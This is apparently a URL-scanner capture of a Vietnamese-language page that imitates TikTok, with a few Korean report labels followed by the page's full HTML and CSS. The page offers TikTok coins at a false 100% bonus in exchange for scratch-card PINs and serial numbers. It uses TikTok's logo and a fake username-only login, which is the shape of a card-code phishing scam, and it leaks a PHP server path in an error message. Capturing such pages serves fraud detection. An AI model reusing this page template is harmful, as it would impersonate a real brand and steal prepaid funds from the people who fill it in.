https://tiktok-vn-khuyenmai-18542.online/

제출된 URL:
https://xutiktok.vn/리디렉션됨
보고서 완료:

링크 · 0개 결과

JavaScript 변수 · 8개 결과

이름유형
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
$function
jQueryfunction
loginButtonobject
loginPopupobject
closeButtonobject

콘솔 로그 메시지 · 0개 결과

HTML

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>Mua &amp; Nạp Xu TikTok Bằng Thẻ Cào</title>
    <link rel="shortcut icon" href="https://www.tiktok.com/favicon.ico" type="image/x-icon" data-rh="true">
    
    <!--<link rel="stylesheet" href="css/styles_tiktok.css">-->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/css/all.min.css" integrity="sha512-xh6O/CkQoPOWDdYTDqeRdPCVd1SpvCA9XXcUnZS2FmJNp1coAFzvtCN9BmamE+4aHK8yyUHUSCcJHgXloTyT2A==" crossorigin="anonymous" referrerpolicy="no-referrer">
    
    <style>
        body {
    font-family: Arial, Helvetica, sans-serif;
}

header {
    border-bottom: 1px solid #eee;
}

header .header {
    max-width: 960px;
    margin: 0 auto;
    padding: 5px 5px;
}
.table-container {
    width: 100%; /* hoặc chiều rộng cụ thể nếu bạn muốn */
    overflow-x: auto; /* Cho phép cuộn ngang */
    padding-bottom: 10px;
}

a {
    text-decoration: none;
}

table {
    width: 100%;
    text-align: center;
}

thead .spacer-row {
    height: 0px;
}

table thead th {
    border-bottom: 1px solid #aaa;
    padding: 10px 15px;
    margin-bottom: 5px;
    background: #eee;
    white-space: nowrap;
}

table tbody td {
    padding: 6px 5px;
    border-bottom: 1px solid #eee;
    font-size: 15px;
    white-space: nowrap;
}

table tbody tr .soluongxu {
    display: flex;
    align-items: center;
    justify-content: center;
}

.tb-login {
    padding: 3px 5px;
    color: #FE2C55;
    font-size: 13px;
    font-style: italic;
}

.thongbao-don {
    display: block;
}

.content {
    max-width: 960px;
    margin: 0 auto;
    padding: 5px;
}

.content .km {
    margin: 15px 0px;
}

.content .list-card {
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
}

.content .list-card .item {
    width: 145px;
    padding: 15px 5px;
    border: 2px solid #eee;
    margin: 5px;
    text-align: center;
    cursor: pointer;
}

.content .list-card .item.selected {
    border-color: #face15;
}

.content .list-card .item img {
    width: 70%;
}

.content .list-xu {
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
}

.content .list-xu .item {
    width: 145px;
    padding: 15px 5px;
    border: 2px solid #eee;
    margin: 5px;
    text-align: center;
    cursor: pointer;
}

.content .list-xu .item.selected {
    border-color: #face15;
}

.content .list-xu .item .xu {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 2px 0px;
}

.content .list-xu .item .xu .currency {
    display: flex;
    align-items: center;
    justify-content: center;
    margin-right: 5px;
    margin-bottom: 3px;
}

.content .list-xu .item .xu .sl {
    justify-content: center;
    align-items: center;
    font-size: 20px;
    font-weight: bold;
}
.daucongxu {
    color: #ECAB53;
}

.mau {
    color: #face15;
}

.maudo {
    color: #fe2c55;
}

.content .list-xu .item .price {
    font-size: 90%;
    font-style: italic;
    margin-top: 3px;
    font-weight: bold;
    color: #999;
}

.content .seri-pin {
}

.content .seri-pin .input {
    padding: 5px;
    margin: 5px 0px;
}

.content .seri-pin .input input {
    width: 100%;
    padding: 13px;
    border: 2px solid #eee;
    box-sizing: border-box;
    font-size: 16px;
}

.content .button {
    padding: 5px;
    margin: 5px 0px;
}

.content .button button {
    width: 100%;
    padding: 13px;
    border: none;
    font-weight: bold;
    font-size: 105%;
    border-radius: 5px;
    background-color: #fe2c55;
    cursor: pointer;
}

.content button:hover {
    background-color: #ef2950;
    color: #fff;
}

#thongbao {
    padding: 3px 5px;
    font-style: italic;
    color: #fe2c55;
    font-size: 95%;
}

#thongbao-login {
    padding: 5px 0px;
    font-style: italic;
    color: #fe2c55;
    font-size: 95%;
    margin-top: 3px;
    margin-bottom: -10px;
}

.thongbao-don {
    padding: 3px 5px;
    font-style: italic;
    color: #fe2c55;
    font-size: 95%;
}

.title {
    font-weight: bold;
    padding: 5px;
    margin-top: 10px;
}

.title-small-login {
    font-weight: bold;
    margin: 10px 0px;
}

.t-title {
    font-size: 18px;
    font-weight: bold;
    margin-bottom: 25px;
    color: #000;
    margin-top: 5px;
    padding: 0 5px;
}

.t-title span {
    position: relative; /* Làm cho span trở thành phần tử cha của pseudo-element */
    display: inline-block; /* Làm cho span có chiều rộng dựa trên nội dung */
}

.t-title span:after {
    content: '';
    display: block;
    margin: 0 auto;
    height: 3px;
    width: 100%;
    background-color: #fe2c55;
    position: absolute;
    left: 0%;
    bottom: -8px;
}

.username {
    font-weight: bold;
    font-size: 115%;
    margin: 5px;
    padding: 18px 15px;
    background-color: #eee;
    border-radius: 5px;
}

.clear {
    height: 50px;
}

.login-form {
    
}

.login-form input {
    width: 100%;
    padding: 13px;
    border: 2px solid #eee;
    box-sizing: border-box;
    font-size: 16px;
}

.login-form button {
    width: 100%;
    padding: 13px;
    border: none;
    color: #fff;
    font-weight: bold;
    font-size: 105%;
    border-radius: 5px;
    margin-top: 15px;
    background-color: #fe2c55;
}

.login-form button:hover {
    background-color: #ef2950;
} 

.login {
    display: flex;
    align-items: center;
    justify-content: left;
    cursor: pointer;
    display: flex;
}

.login svg {
}

.login span {
    margin-left: 10px;
}


.login-in {
    display: flex;
}

.login-in .right {
    display: flex;
    align-items: center;
    justify-content: right;
    cursor: pointer;
    width: 20%;
}

.login-in .right a {
    color: #fe2c55;
    text-decoration: none;
    font-style: italic;
    font-size: 80%;
}

.login-in .left {
    display: flex;
    align-items: center;
    justify-content: left;
    cursor: pointer;
    width: 80%;
}

.login-in .left .img {
    width: 55px;
}

.login-in .left .img .avt {
    border: 1px solid #ddd;
    border-radius: 50%;
    width: 50px;
}

.login-in .left .info {
    margin-left: 10px;
}

.login-in .left .info div {
    
}

.login-in .left svg {
}


.title-login {
    font-size: 140%;
    font-weight: bold;
    margin: 30px 0px;
    text-align: center;
}

.popup-container {
    position: fixed;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0,0,0,0.8);
    display: flex;
    justify-content: center;
    align-items: center;
    opacity: 1 !important;
}

/* Style cho nội dung của popup */
.popup-content {
    background: white;
    padding: 20px;
    border-radius: 5px;
    position: relative;
    margin: 0px 15px;
    transform: translateY(-50px);
    width: 400px;
    z-index: 1000;
}

@media (max-width: 499px) {
    .popup-content {
        background: white;
        padding: 20px;
        border-radius: 5px;
        position: relative;
        margin: 0px 15px;
        transform: translateY(-50px);
        width: 100%;
        z-index: 1000;
    }
}

/* Nút đóng (x) */
.close {
    position: absolute;
    top: 20px;
    right: 20px;
    cursor: pointer;
}

.disabled {
    pointer-events: none; /* Ngăn tất cả sự kiện chuột */
    opacity: 0.8; /* Làm mờ nội dung để chỉ ra tính không khả dụng */
}

.disabled * {
    color: gray; /* Đặt màu sắc của tất cả phần tử con thành màu xám */
}

.btn-non-login {
    background-color: #ff97ac;
    color: #fff;
}

.btn {
    color: #fff;
    background-color: #fe2c55;
}

.dieukhoan {
    font-size: 15px;
    font-style: italic;
    color: green;
    padding: 5px;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

.spinner {
    animation: spin 1s linear infinite;
}

.tb-khuyenmai {
    margin: 8px 10px;
    padding: 10px 20px;
    background-color: rgb(249, 242, 235);
    overflow: hidden;
    border-radius: 5px;
}

.tb-container {
    display: flex;
    align-items: center;
    justify-content: space-between;
    color: white;
    border-radius: 5px;
    font-size: 15px;
    position: relative;
    overflow: hidden;
}
.tb-message {
    color: rgb(179 96 0);
}

.tb-khuyenmai img {
    display: block;
    width: 80px;
}
    </style>
</head>

<body>
    <header>
        <div class="header">
            <a href="/">
                <span>
                    <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 118 42" width="118" height="42" alt="TikTok">
                        <path fill="#25F4EE" d="M9.875 16.842v-1.119A8.836 8.836 0 008.7 15.64c-4.797-.006-8.7 3.9-8.7 8.707a8.706 8.706 0 003.718 7.135A8.675 8.675 0 011.38 25.55c0-4.737 3.794-8.598 8.495-8.707z">
                        </path>
                        <path fill="#25F4EE" d="M10.086 29.526c2.14 0 3.89-1.707 3.967-3.83l.006-18.968h3.463a6.78 6.78 0 01-.11-1.202h-4.726l-.006 18.969a3.978 3.978 0 01-3.967 3.829 3.93 3.93 0 01-1.846-.46 3.949 3.949 0 003.22 1.662zM23.992 13.166v-1.055a6.506 6.506 0 01-3.583-1.068 6.571 6.571 0 003.583 2.123z">
                        </path>
                        <path fill="#FE2C55" d="M20.409 11.043a6.54 6.54 0 01-1.616-4.315h-1.265a6.557 6.557 0 002.88 4.316zM8.706 20.365a3.98 3.98 0 00-3.973 3.976c0 1.528.869 2.858 2.134 3.523a3.936 3.936 0 01-.754-2.321 3.98 3.98 0 013.973-3.976c.409 0 .805.07 1.175.185v-4.833a8.837 8.837 0 00-1.175-.083c-.07 0-.134.006-.204.006v3.708a3.999 3.999 0 00-1.176-.185z">
                        </path>
                        <path fill="#FE2C55" d="M23.992 13.166v3.676c-2.453 0-4.727-.786-6.58-2.116v9.621c0 4.802-3.902 8.714-8.706 8.714a8.669 8.669 0 01-4.988-1.579 8.69 8.69 0 006.368 2.781c4.797 0 8.707-3.906 8.707-8.714v-9.621a11.25 11.25 0 006.579 2.116v-4.73c-.48 0-.94-.052-1.38-.148z">
                        </path>
                        <path fill="black" d="M17.413 24.348v-9.622a11.251 11.251 0 006.58 2.116v-3.676a6.571 6.571 0 01-3.584-2.123 6.61 6.61 0 01-2.888-4.315H14.06l-.006 18.968a3.978 3.978 0 01-3.967 3.83A3.99 3.99 0 016.86 27.87a3.991 3.991 0 01-2.133-3.523A3.98 3.98 0 018.7 20.372c.409 0 .805.07 1.175.185v-3.708c-4.701.103-8.495 3.964-8.495 8.701 0 2.29.888 4.373 2.338 5.933a8.669 8.669 0 004.988 1.58c4.798 0 8.707-3.913 8.707-8.714zM30.048 13.179h14.774l-1.354 4.232h-3.832v15.644h-4.778V17.41l-4.804.006-.006-4.238zM69.032 13.179h15.12l-1.355 4.232h-4.17v15.644h-4.785V17.41l-4.804.006-.006-4.238zM45.73 19.502h4.733v13.553h-4.708l-.026-13.553zM52.347 13.128h4.733v9.257l4.689-4.61h5.646l-5.934 5.76 6.644 9.52h-5.213l-4.433-6.598-1.405 1.362v5.236H52.34V13.128h.006zM102.49 13.128h4.734v9.257l4.688-4.61h5.647l-5.934 5.76 6.643 9.52h-5.206l-4.433-6.598-1.405 1.362v5.236h-4.734V13.128zM48.093 17.954a2.384 2.384 0 002.382-2.384 2.384 2.384 0 10-2.382 2.384z">
                        </path>
                        <path fill="#25F4EE" d="M83.544 24.942a8.112 8.112 0 017.474-8.087 8.748 8.748 0 00-.709-.026c-4.478 0-8.106 3.631-8.106 8.113 0 4.482 3.628 8.113 8.106 8.113.21 0 .498-.013.71-.026-4.178-.326-7.475-3.823-7.475-8.087z">
                        </path>
                        <path fill="#FE2C55" d="M92.858 16.83c-.217 0-.505.012-.716.025a8.111 8.111 0 017.468 8.087 8.112 8.112 0 01-7.468 8.087c.211.02.499.026.716.026 4.478 0 8.106-3.631 8.106-8.113 0-4.482-3.628-8.113-8.106-8.113z">
                        </path>
                        <path fill="black" d="M91.58 28.887a3.94 3.94 0 01-3.94-3.945 3.94 3.94 0 117.882 0c0 2.18-1.77 3.945-3.942 3.945zm0-12.058c-4.477 0-8.106 3.631-8.106 8.113 0 4.482 3.629 8.113 8.106 8.113 4.478 0 8.106-3.631 8.106-8.113 0-4.482-3.628-8.113-8.106-8.113z">
                        </path>
                    </svg>
                </span>
            </a>
        </div>
    </header>

    <div class="content">
        <div class="t-title">
            <span>Mua &amp; Nạp Xu TikTok Bằng Thẻ Cào</span>
        </div>
        <div class="username">
                            <div class="login">
                    <svg font-size="44px" viewBox="0 0 48 48" fill="currentColor" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em"><circle cx="24" cy="24" r="24" fill="#C3C3C3"></circle><circle cx="24" cy="22" r="9" fill="#F0F0F0"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M8.28 42.16a18 18 0 0131.37 0A23.9 23.9 0 0123.97 48c-6 0-11.48-2.2-15.69-5.84z" fill="#F0F0F0"></path></svg>
                    <span>Đăng nhập</span>
                </div>
                    </div>
        <div class="tb-login">Đăng nhập vào hệ thống không yêu cầu nhập mật khẩu. Vui lòng không cung cấp mật khẩu của bạn cho bất kỳ ai.</div>
        <div class="content-login">
            <div class="goixu disabled">
                <div class="title">Chọn mệnh giá thẻ và gói xu</div>
                <div class="tb-khuyenmai">
                    <div class="tb-container">
                        <div class="tb-message">
                            Khuyến mãi <strong><span style="color: red;">100% Xu</span></strong> khi mua và nạp xu bằng thẻ có mệnh giá từ <strong><span style="color: red;">100,000đ</span></strong> trở lên!
                        </div>
                        <!--<div class="countdown">-->
                        <!--"aaa"-->
                        <!--</div>-->
                        <div>
                            <img class="h-64 " src="https://sf16-website-login.neutral.ttwstatic.com/obj/tiktok_web_login_static/unified-wallet-desktop/sg/static/image/referral-banner-img.b446df71.png" alt="referral image">
                        </div>
                    </div>    
                </div>    
                <div class="list-xu">
                    <div class="item" value="50000">
                        <div class="xu">
                            <span class="currency">
                                <svg width="24px" data-e2e="" height="24px" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                    <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path>
                                    <path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path>
                                </svg>
                            </span>
                            <span style="font-weight: bold; font-size: 17px;">+</span>
                            <span class="sl">330</span>
                        </div>
                        <div class="price">
                            50,000₫
                        </div>
                    </div>
                    <div class="item" value="100000">
                        <div class="xu">
                            <span class="currency">
                                <svg width="24px" data-e2e="" height="24px" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                    <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path>
                                    <path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path>
                                </svg>
                            </span>
                            <span><del>660</del></span>&nbsp;
                            <span class="daucongxu" style="font-weight: bold; font-size: 17px;">+</span>
                            <span class="sl"><font color="#ECAB53">1,320</font></span>
                        </div>
                        <div class="price">
                            100,000₫
                        </div>
                    </div>
                    <div class="item" value="200000">
                        <div class="xu">
                            <span class="currency">
                                <svg width="24px" data-e2e="" height="24px" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                    <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path>
                                    <path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path>
                                </svg>
                            </span>
                            <span><del>1,320</del></span>&nbsp;
                            <span class="daucongxu" style="font-weight: bold; font-size: 17px;">+</span>
                            <span class="sl"><font color="#ECAB53">2,640</font></span>
                        </div>
                        <div class="price">
                            200,000₫
                        </div>
                    </div>
                    <div class="item" value="300000">
                        <div class="xu">
                            <span class="currency">
                                <svg width="24px" data-e2e="" height="24px" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                    <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path>
                                    <path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path>
                                </svg>
                            </span>
                            <span><del>1,980</del></span>&nbsp;
                            <span class="daucongxu" style="font-weight: bold; font-size: 17px;">+</span>
                            <span class="sl"><font color="#ECAB53">3,960</font></span>
                        </div>
                        <div class="price">
                            300,000₫
                        </div>
                    </div>
                    <div class="item" value="500000">
                        <div class="xu">
                            <span class="currency">
                                <svg width="24px" data-e2e="" height="24px" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                    <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path>
                                    <path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path>
                                </svg>
                            </span>
                            <span><del>3,300</del></span>&nbsp;
                            <span class="daucongxu" style="font-weight: bold; font-size: 17px;">+</span>
                            <span class="sl"><font color="#ECAB53">6,600</font></span>
                        </div>
                        <div class="price">
                            500,000₫
                        </div>
                    </div>
                    <div class="item" value="1000000">
                        <div class="xu">
                            <span class="currency">
                                <svg width="24px" data-e2e="" height="24px" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                    <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path>
                                    <path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path>
                                </svg>
                            </span>
                            <span><del>7,000</del></span>&nbsp;
                            <span class="daucongxu" style="font-weight: bold; font-size: 17px;">+</span>
                            <span class="sl"><font color="#ECAB53">14,000</font></span>
                        </div>
                        <div class="price">
                            1,000,000₫
                        </div>
                    </div>
                </div>
                <div id="thongbao-menhgia" class="thongbao-don"></div>
            </div>
            <div class="thanhtoan disabled">
                <div class="title">Chọn nhà cung cấp thẻ để thanh toán</div>
                <div class="list-card">
                    <div class="item" value="Viettel"><img src="/img/thecao/viettel.png"></div>
                    <div class="item" value="VinaPhone"><img src="/img/thecao/vinaphone.png"></div>
                    <div class="item" value="MobiFone"><img src="/img/thecao/mobifone.png"></div>
                    <div class="item" value="VNMOBI"><img src="/img/thecao/vietnamobile.png"></div>
                    <div class="item" value="Zing"><img src="/img/thecao/zing.png"></div>
                    <div class="item" value="Garena"><img src="/img/thecao/garena.png"></div>
                </div>
                <div id="thongbao-loaithe" class="thongbao-don"></div>
            </div>
            <div class="seri-pin disabled" style="display: none;">
                <div class="title">Thông tin thanh toán bằng thẻ <span id="card"></span></div>
 
                <div class="input">
                    <input type="text" name="mathe" placeholder="Điền mã thẻ cào in dưới lớp giấy bạc">
                </div>
                <div class="input">
                    <input type="text" name="seri" placeholder="Điền số seri in trên thẻ cào">
                </div>
                <div id="thongbao-serimathe" class="thongbao-don"></div>
            <div class="title">Xác nhận thanh toán</div>
                <div class="tttt" style="padding: 0px 7px 5px; display: none;">
                    <div style="padding: 2px 0px;">Bạn sẽ nạp <span id="sl_xu" style="font-weight: bold;color: #fe2c55"></span> vào ID TikTok: <b style="color: #fe2c55"><br>
<b>Warning</b>:  Undefined array key "login" in <b>/www/wwwroot/redirect.xutiktok.bm/index.php</b> on line <b>745</b><br>
</b></div>
                    <div style="padding: 2px 0px;">Thanh toán bằng thẻ cào <span id="card1" style="font-weight: bold;"></span> mệnh giá <span id="mg" style="font-weight: bold;"></span></div>
                </div>
                
                <div class="dieukhoan">(*) Bằng cách bấm vào Thanh toán đồng nghĩa với việc bạn đã chấp nhận điều khoản dịch vụ của chúng tôi.</div>
                <div id="thongbao"></div>
            </div>
            <div class="button">
                <button type="submit" class="btn-non-login disabled" name="napxu">
                    Vui lòng đăng nhập trước khi thanh toán                </button>
            </div>
        </div>
        <div class="clear"></div>
                <div class="clear"></div>
        <div class="clear"></div>
    </div>
    
    <div id="loginPopup" class="popup-container" style="display:none;">
        <div class="popup-content">
            <span class="close">
                <div data-e2e="modal-close-inner-button" role="button" tabindex="0" aria-label="Đóng" class="tiktok-1ecw34m-DivCloseWrapper e1gjoq3k6" style="transform: scale(1.7);"><svg class="tiktok-1anes8e-StyledIcon e1gjoq3k5" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="currentColor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M21.1718 23.9999L10.2931 13.1212C9.90261 12.7307 9.90261 12.0975 10.2931 11.707L11.7074 10.2928C12.0979 9.90228 12.731 9.90228 13.1216 10.2928L24.0002 21.1715L34.8789 10.2928C35.2694 9.90228 35.9026 9.90228 36.2931 10.2928L37.7073 11.707C38.0979 12.0975 38.0979 12.7307 37.7073 13.1212L26.8287 23.9999L37.7073 34.8786C38.0979 35.2691 38.0979 35.9023 37.7073 36.2928L36.2931 37.707C35.9026 38.0975 35.2694 38.0975 34.8789 37.707L24.0002 26.8283L13.1216 37.707C12.731 38.0975 12.0979 38.0975 11.7074 37.707L10.2931 36.2928C9.90261 35.9023 9.90261 35.2691 10.2931 34.8786L21.1718 23.9999Z"></path></svg>
                </div>
            </span>
            <div class="title-login" style="text-align: center">Đăng nhập TikTok</div>
            
            <div class="title-small-login">ID tài khoản TikTok</div>
            <form id="loginForm" class="login-form">
                <input type="text" placeholder="Nhập ID tài khoản TikTok (VD: username)" name="username">
                <div id="thongbao-login"></div>
                <button type="submit" name="login">Đăng nhập</button>
            </form>
            <div class="clear"></div>
        </div>
    </div>

    

    <footer>
        <div class="footer"></div>
    </footer>
    
    <script src="js/napxu.js"></script>


















</body></html>